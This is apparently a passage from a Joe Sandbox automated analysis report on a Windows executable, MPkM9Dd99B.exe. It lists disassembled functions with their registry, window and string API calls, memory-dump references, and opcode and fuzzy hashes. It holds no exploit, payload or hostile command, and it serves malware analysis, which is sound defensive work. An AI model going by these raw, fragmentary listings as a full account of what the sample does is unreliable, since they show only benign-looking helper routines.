                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                                Function 00401D8A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401DA3
                                • GetClientRect.USER32(?,?), ref: 00401DF1
                                • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                • DeleteObject.GDI32(00000000), ref: 00401E45
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                Function 00404B76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                • wsprintfA.USER32 ref: 00404C1C
                                • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 17096d46716481697b9a4a6888529ebbe9c3f7ba7e60b1f399950c36a032e1d6
                                • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                • Opcode Fuzzy Hash: 17096d46716481697b9a4a6888529ebbe9c3f7ba7e60b1f399950c36a032e1d6
                                • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                Function 00405C1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                                • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-4083868402
                                • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                                • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                                Function 00405CB8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405CC6
                                • CharNextA.USER32(00000000), ref: 00405CCB
                                • CharNextA.USER32(00000000), ref: 00405CDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CharNext
                                • String ID: C:\
                                • API String ID: 3213498283-3404278061
                                • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                                • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                                Function 00402ECD Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                • GetTickCount.KERNEL32 ref: 00402EFE
                                • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                Function 00405345 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00405374
                                • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                  • Part of subcall function 00404379: SendMessageA.USER32(0001043C,00000000,00000000,00000000), ref: 0040438B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                Function 00403A01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(?,75573410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                                • GlobalFree.KERNEL32(00000000), ref: 00403A22
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Free$GlobalLibrary
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1100898210-4083868402
                                • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                                • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                                Function 00405C66 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MPkM9Dd99B.exe,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MPkM9Dd99B.exe,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\Desktop
                                • API String ID: 2709904686-1876063424
                                • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                                • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                                Function 00405D85 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: lstrlen$CharNextlstrcmpi
                                • String ID:
                                • API String ID: 190613189-0
                                • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C